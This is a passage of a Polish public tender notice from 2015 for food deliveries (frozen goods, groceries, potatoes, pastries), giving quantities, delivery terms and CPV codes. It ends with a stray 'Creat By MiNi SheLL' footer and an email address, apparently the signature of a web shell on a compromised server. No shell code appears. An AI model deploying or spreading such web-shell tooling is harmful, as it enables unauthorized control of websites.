6	Mleko spożywcze w folii 2,0% 11, mleko pasteryzowane w wysokiej temp., wart. odżywcza w 100 g, wart. energetyczna 58 kcl. (243 Kj), białko 3g, węglowodany 4,3g, tłuszcz 2,0g.	3000
7	ser biały twaróg półtłusty 3,5% tłuszczu (kg)	420
8	ser twardy żółty salami pełnotłusty (kg)	200
9	ser twardy żółty gouda (kg)	20
10	serek topiony zegary  200g	200
11	śmietana 30% % 1 w folii 250 ml,wart. Energetyczna 100g291kal (1218 kJ)	2000
12	serek wiejski granulowany 200g	160
13	serek homogenizowany 150g	600
14	serek homogenizowany 140g z owocami	1000
15	ser feta 270g	70
16	jogurt naturalny 340g	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ  VIII  -   MROŻONE  WARZYWA, OWOCE, POTRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ  VIII  -   MROŻONE  WARZYWA, OWOCE, POTRAWY 
1.	Przewidywana częstotliwość dostaw raz w tygodniu do godz. 8.30 rano;
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia  nie krótszy niż ?  terminu liczonego od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.



Ilość w kg:
1.	kostka z mintaja mrożona	15
2.	truskawki mrożone całe owoce 2500g	160
3.	marchew z groszkiem mrożona 450g	20
4.	frytki ziemniaczane karbowane 1500g	26
5.	fasolka szparagowa zielona mroź. 450G	28
6.	filety śledziowe solone	40
7.	filet z miruny ze skórą mrożony	400
8.	barszcz ukraiński mrożony 2500g	45
9.	kalafior mrożony  2500g	60
10.	zupa jarzynowa mrożona 2500g	60
11.	makrela wędzona	70

Ilość  w szt.:
1.	kluski śląskie 450g	250
2.	knedle z owocami mroź. 450g	200
3.	lody 200ml	200
4.	pierogi z kapustą i grzyb.mroż.450g	50
5.	pierogi z mięsem mrożone 450g	110
6.	pierogi z owocami mrożone 450g	200
7.	pierogi z serem mrożone 450g	230
8.	pyzy ziemniaczane mrożone 450g	250
9.	pyzy ziemniaczane z mięsem mroż 450g	100
10.	uszka z mięsem mrożone 350g	160
11.	uszka z pieczarkami mrożone 350g	20
12.	zupa grzybowa 450g	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> CZĘŚĆ   IX  -   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   IX  -   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE 

1.	Przewidywana częstotliwość dostaw 1 - 2  razy w tygodniu nie później niż  do godz. 8.30 rano
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże, w pierwszym gatunku,  zgodne z obowiązującymi normami.
5.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia  nie krótszy niż 3/4 terminu liczonego  od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.


Ilość w szt.:
1.	 wafel pokryty czarną czekoladą wypełniony nadzieniem mleczno-orzechowym. 43 g, wartości odżywcze w 1 00 g: wartość energetyczna 570,00 kcal Białko 9,80 g Węglowodany 48,20 g Tłuszcz 37,50 g	600
2.	ananasy w puszce plastry 565 g	30
3.	baton czekoladowy 45g. Skład: nugatowe nadzienie oblane mleczną czekoladą	300
4.	biszkopty z galaretką w polewie czekoladowej 147g (wart. odżywcza w 100g produktu, wart. energetyczna 1535 kcal/365kj,  białko 3,30g, węglowodany 70g, tłuszcz 7,30g )	120
5.	budyń 64g bez cukru na 3/4 1 mleka	250
6.	chrzan 180g, skład: chrzan -90 %, cukier, ocet spirytusowy, woda, sól, kw. cytrynowy, regulator kwasowości, olej roślinny, mleko w proszku, substancje konserwujące E- 223	40
7.	ciastka kruche - 1 kg	10
8.	cukier waniliowy   32g	30
9.	cukier z buraków cukrowych 1kg	1000
10.	cukierki czekoladowe - 1 kg	20
11.	czekolada mleczna 100g wartość odżywcza 2216kJ/530kcal,białko 6g,tłuszcz 18,8g, cukier 56,9g	200
12.	dżem niskosłodzony różne smaki 280g. Sporządzony z 40g owoców na 100g produktu	1200
13.	fasola biała sucha 400g	150
14.	fasola czerwona konserw z otwarciem 400g	110
15.	galaretki różne smaki   79g	630
16.	groch  łuskany połówki 400g	110
17.	groszek konserwowy puszka z otwarciem 400g	220
18.	herbata granulowana 90g	300
19.	herbatniki zwykłe 50g	480
20.	kakao l00g, wart. odżywcza w l00g produktu: wart. Energetyczna 1276kJ/307kcI, białko 20,4g, węglowodany 15,6g, tłuszcz 11g	80
21.	kasza gryczana 400g	300
22.	kasza jęczmienna pęczak 500g	300
23.	kasza jęczmienna średnia   500g	50
24.	kasza manna 500g	30
25.	kawa inka 150g	50
26.	ketchup 500g, (łagodny/pikantny)skład: 163g pomidorów na 100g produktu cukier, cebula 7%, skrobia kukurydziana, substancja zagęszczająca, ocet, kwasek cytrynowy - regulator kwasowości, sól, przyprawy, wart. odżywcza w 100g produktu: wart. Energetyczna 429kJ/101 kcal, białko 1,9 g, węglowodany 22,5 g, tłuszcz 0,4 g	120
27.	kisiel bez cukru na 3/4 1 wody 58g (różne smaki)	60
28.	koncentrat pomidorowy 30% 190g, wart. odżywcza w l00g produktu: wart. Energetyczna 435kJ/104kcl, białko 5,6g, węglowodany 16,7g, tłuszcz l,5g	150
29.	krem czekoladowy do smarowania z orzechami laskowymi, 15g. skład: cukier, olej roślinny, orzechy laskowe(13%), kakao w proszku o obniżonej zaw. tł.(7,4%), mleko odtłuszcz. w proszku5%.	1000
30.	krem czekoladowy do smarowania z orzechami laskowymi, 460ml. skład: cukier, olej roślinny, orzechy laskowe(13%), kakao w proszku o obniżonej zaw. tł.(7,4%), mleko odtłuszcz. w proszku5%.	30
31.	krem toffi 180g (wart. Odżywcza w 100g :wart. Energ. 2309 kcal/552 kJ , białko 2,20g, węglow. 62,3g, tłuszcz 32,7 g )	100
32.	kukurydza w puszce z otwarciem 400g	360
33.	kwasek cytrynowy 20g	180
34.	liść laurowy    6g	20
35.	majeranek 10g	100
36.	majonez stołowy 320ml zawartości tł. 70%, wart. odżywcza w 100g produktu: wart. Energetyczna 2715kJ/648kcl, białko 0,9g, węglowodany 3,5g, tłuszcz 70,0g	400
37.	makaron nitka średnia   800g	100
38.	makaron spaghetti 500g	100
39.	makaron świderki 800g	500
40.	makaron zacierkowy 250g	120
41.	margaryna w kostce do gotowania, pieczenia i smażenia 250g. o zmniejszonej zawartości tłuszczu(tł.60%), skład:oleje i tł. roślinny, utwardzacz, woda, sól, subst. konserw., subst. wzbogacaj.	400
42.	mąka pszenna typ 500 1kg 	350
43.	mikołaje czekoladowe 60g	100
44.	miód sztuczny 260g 	20
45.	musztarda stołowa      180ml.	100
46.	olej jadalny 1 1 z pierwszego tłoczenia, filtrowany na zimno, wart. Energetyczna 3700kJ/900kcl	140
47.	olej jadalny rzepakowy 250ml	20
48.	Papryka mielona ostra 10g	20
49.	Papryka mielona słodka l0g	20
50.	paprykarz szczeciński 300g	200
51.	pasztecik drobiowy 50g wart. odżywcza w lOOg produktu: wart. energetyczna 760kJ/184kcl, białko 7g, węglowodany 4g, tłuszcz 16g	2000
52.	pieprz czarny mielony 1 5 g	100
53.	pieprz ziarnisty 15g	10
54.	płatki czekoladowe 225g	300
55.	płatki miodowe 225g	200
56.	płatki musli 225g	100
57.	płatki owsiane 400g	50
58.	przyprawa do grosa 30g	20
59.	przyprawa warzywna do zup 200g wart energ. 137 kcal/583kJ,białko 8,5g, węglow. 24,5g, tłuszcz 0,6g	220
60.	ryba w oleju  (śledź ) puszka 170g z otwieraczem	300
61.	ryba w pomidorach (śledź ) puszka 170g z otwieraczem	500
62.	ryż zwykły 1 kg	70
63.	ryż zwykły 500g	300
64.	Serduszka czekoladowe 80g	150
65.	soki marchewkowe 330ml (różne smaki)	500
66.	soki owocowe 1l (różne smaki)	300
67.	soki w kartonach 21 wielosmakowe	50
68.	sos do spaghetti w słoiku 520g (wart. odżyw. w 100g prod. wart. energ. 403kJ/95 kcal, tłuszcz 1,4g, węglow. 18,6g, białko 1,5g )	150
69.	sos sałatkowy 50g	100
70.	sos słodko-kwaśny w słoiku 520g	60
71.	sól miałka 1kg	300
72.	syrop owocowy różne smaki 430ml	60
73.	Śliwka suszona kalifornijska - 1 kg	25
74.	tuńczyk w sosie własnym kawałki 170g	140
75.	Woda mineralna 0,5l	200
76.	Woda mineralna 1,50l	100
77.	zupa biały barszcz w proszku 66g 
wart energ.44kJ/11kcal,białko 0,7g,węglowodany1,10g,tłuszcze 0,30g	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> CZĘŚĆ   X -   ZIEMNIAKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ   X -   ZIEMNIAKI

1.	Przewidywana częstotliwość dostaw:  raz w tygodniu do godz. 8.30 rano.
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
4.	Produkty muszą być świeże, I klasy, pierwszego gatunku, zgodne z obowiązującymi normami.
Ilość w kg:
1.	Ziemniaki 	9 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV. CIASTA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV - CIASTA
1.	Przewidywana częstotliwość dostaw:   3 - 4 razy w miesiącu nie później niż do godz. 8.30 rano. 
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły  dotyczące ilości i asortymentu dostaw dziennych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na bieżąco, według  potrzeb Zamawiającego.
1.	Drożdżówki z dżemem sztuk ( po 80g)	500
2.	Drożdżówki z serem - sztuk (po 80 g)	500
3.	Pączki z marmoladą sztuk ( po 70g)	800
4.	Ciasto drożdżowe (sztuk po 500g)	4
5.	Makowiec sztuk ( po 500 g)	8
6.	Keks sztuk ( po 450g)	4
7.	Sernik - kg 	17 kg
8.	Piernik z dżemem - kg	4 kg
9.	Oponki - sztuk ( po 80 g )	800
10.	Rożki francuskie - sztuk (po 90g)	150
11.	Faworki (kg)	3 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com